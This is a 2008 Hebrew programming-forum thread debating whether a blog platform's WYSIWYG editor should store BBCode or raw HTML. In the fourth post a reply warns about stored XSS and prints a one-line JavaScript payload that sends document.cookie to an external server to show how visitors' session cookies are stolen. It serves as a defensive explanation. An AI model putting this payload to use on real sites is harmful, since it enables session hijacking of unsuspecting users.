לוגו אתר Fresh          
 
 
  אפשרות תפריט  ראשי     אפשרות תפריט  צ'אט     אפשרות תפריט  מבזקים     אפשרות תפריט  צור קשר     חץ שמאלה ‎print ‎"Hello World!"; if‎ ‎not rules.‎know ‎then rules.‎read(); חץ ימינה  

לך אחורה   לובי הפורומים > מחשבים > תכנות ובניית אתרים
שמור לעצמך קישור לדף זה באתרי שמירת קישורים חברתיים
תגובה
 
כלי אשכול חפש באשכול זה



  #1  
ישן 22-05-2008, 10:22
צלמית המשתמש של fcf
  משתמש זכר fcf fcf אינו מחובר  
 
חבר מתאריך: 17.09.05
הודעות: 6,023
שלח הודעה דרך ICQ אל fcf שלח הודעה דרך MSN אל fcf Facebook profile
bbcode VS html

שלום
אני מתכנן לבנות מערכת בלוגים חדשה ...
לכל משתמש יהיה פאנל ניהול ובו הוא יוכל להוסיף תוכן לבלוג שלו.

בפאנל הניהול יהיה עורך WYSIWYG של TinyMCE

השאלה שלי היא האם עלי לקודד התוכן לBBCODE ? לדעתי יותר נוח לא לקודד אבל יכולות להיות בזה סכנון, השאלה היא עד כמה זה "מסוכן" . הרי מקסימום יוכלו להכניס קוד JS . הרי כל אחד שולט על הבלוג שלו בלבד והוא יוכל להכניס JS לבלוג שלו בלבד. זה לא משהו שממש מזיק למערכת. אם הוא רוצה להזריק לעצמו JS לבלוג, שיזריק.

בכל שאר המקומות באתר לא יהיה ניתן לכתוב בכלל HTML (בתגובות לבלוגים לדוגמא)
השאלה היא האם להגדיר את העורך שיוצא BBCODE או האם לשמור HTML רגיל ?
כמובן שלמסד אני ישלח את הקוד אחרי שאני יפעיל htmlspechialchars אבל בכל זאת, הדבר היחידי שניתן יהיה להזריק זה JS לתוך הבלוג של עצמך

מה שלא ציינתי זה שBBCODE ממש מגביל את האפשרויות של העורך, ככה שבכל מקרה אני מעדיף להשתמש בHTML
תודה
_____________________________________
תמונה שהועלתה על ידי גולש באתר ולכן אין אנו יכולים לדעת מה היא מכילה
תמונה שהועלתה על ידי גולש באתר ולכן אין אנו יכולים לדעת מה היא מכילה

תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
  #2  
ישן 22-05-2008, 11:44
  משתמש זכר eXtruct eXtruct אינו מחובר  
 
חבר מתאריך: 27.10.05
הודעות: 1,067
בתגובה להודעה מספר 1 שנכתבה על ידי fcf שמתחילה ב "bbcode VS html"

קודם כל אין בכלל קשר ל PHP לדעתי..
דבר שני:
קיים קוד JS שגונב קוקיז של כל המשתמשים שיכנסו לעמוד בו הוא ממוקם, אני לא הייתי רוצה להיכנס לבלוג של מישהוא בידיעה שיכול להיות לו קוד JS שגונב את הקוקיז שלי, ככה שאני מציעה לך או לחסום JS בכלל או לכתוב שפת סקיפרטים משלך שהיא מוגבלת עד מאוד, או פשוט לחסום קודים מזיקים של JS.
עכשיו תבין BBCODE זה לא משהוא שנועד כביכול לחסום קוד JS זו היא "שפת" MARKUP (לא יודע איך לתרגם לעיברית) שנועדה לאפשר עיצוב של עמוד שתנאים מוגבלים. אתה חוסם את כל ה HTML וכותב כביכול שפת מיניHTML שמאוד מוגבלת באפשרויות שהיא בעצם BBCODE.
עכשיו תחשוב על הפאשרות שאתה שומר כ HTML רגיל, מה מונע ממני להרוס את העיצוב שלך על ידי סגירת התג </body>?
קיצר תשתמש ב BBCODE או שתאפשר שימוש תגי HTML מוגבלים כגון <b> <i> <u> (למרות שנראה לי שכולם כבר deprecated מבחינת הסטנדרטים, תן לי לברר את זה [עריכה ללא הם לא deprecated אתה יכול פשוט לאפשר את השימוש בהם וזהו אותה מסודר, וכל השאר לסנן]).

נערך לאחרונה ע"י eXtruct בתאריך 22-05-2008 בשעה 11:50.
תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
  #4  
ישן 22-05-2008, 12:45
  משתמש זכר eXtruct eXtruct אינו מחובר  
 
חבר מתאריך: 27.10.05
הודעות: 1,067
בתגובה להודעה מספר 3 שנכתבה על ידי fcf שמתחילה ב "אני לא מאמין שדפדפן שמכבד את..."

אני בן וחשבתי שהסמל של האיש הכחול ליד השם שלי אמור להדגיש את זה כמו שצריך...

טוב אניוואי לא קשור לדפדפן שמכבד או לא מכבד יש פקודה document.cookie שמדפיסה את ערך הקוקי. אני יכול בעזרת JS ליצור אובייקט תמונה שה SRC שלו יהיה אתר חיצוני משהוא סגנון
קוד:
new Image().src = "http://www.abc.com/script.php?a"+encodedURI(document.cookie)

כאשר ABC זה השרת שלי ו SCRIPT זה סקריפט שלי שמקבל ערך של קוקי ומכניס אותו לבסיס נתונים או משהוא אחר סגנון.

בקשר לזה אפשר לשתול קוד כזה בכל עמוד, אפשר לישתול עוד מיליוני קודים שונים שומזיקים יותר בכל עמוד אבל לא עושים את זה, זה סוג אמונה, כמו שאני מאמין שפרש לדוגמא לא ינסה לגנוב את הקוקיז שלי כי יש לי אמונה לפרש אבל אתר בסגנון w*w.mega.warez.com/a-lot-of-free-programs אני אפילו לא טורח להיכנס כי לא רק שיכול להיות שם XSS שגונב קוקי אלה הרבה יותר דברים אחרים. (שמתי כוכבית כי אין לי מושג אם אתר כזה קיים ואם כן אז הכוכבית תנמע מפרש להפוך אותו להיפר קישור)

בקשר למי שרוצה להרוס שיהרוס. שמע לא יודע לדעתי אפשרות של XSS או SQL INJ או עוד כל מיני באגים אפילו אם הם לא מזיקים כמו מתן אפשרות להכניס את התג </table> לתוכן העמוד מראה על אי רצינות או אי ידע של המפתח אבל זו רק דעתי.

ובקשר ללינוס אין קשר בכלל בין מה שאמרת, בלינוקס אין וירוסים כי לינוקס לא נותן לך גישת ROOT מלכתחילה כמו חלונות ובלי גישת רות אתה לא יכול להזיק למערכת ממש, כמו כן זה קוד פתוח לכן כל פירצת אבטחה שנמצא תתוקן גג תוך שבוע.

נערך לאחרונה ע"י eXtruct בתאריך 22-05-2008 בשעה 12:48.
תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
תגובה

כלי אשכול חפש באשכול זה
חפש באשכול זה:

חיפוש מתקדם
מצבי תצוגה דרג אשכול זה
דרג אשכול זה:

מזער את תיבת המידע אפשרויות משלוח הודעות
אתה לא יכול לפתוח אשכולות חדשים
אתה לא יכול להגיב לאשכולות
אתה לא יכול לצרף קבצים
אתה לא יכול לערוך את ההודעות שלך

קוד vB פעיל
קוד [IMG] פעיל
קוד HTML כבוי
מעבר לפורום



כל הזמנים המוצגים בדף זה הם לפי איזור זמן GMT +2. השעה כעת היא 20:26

הדף נוצר ב 0.04 שניות עם 12 שאילתות

הפורום מבוסס על vBulletin, גירסא 3.0.6
כל הזכויות לתוכנת הפורומים שמורות © 2024 - 2000 לחברת Jelsoft Enterprises.
כל הזכויות שמורות ל Fresh.co.il ©

צור קשר | תקנון האתר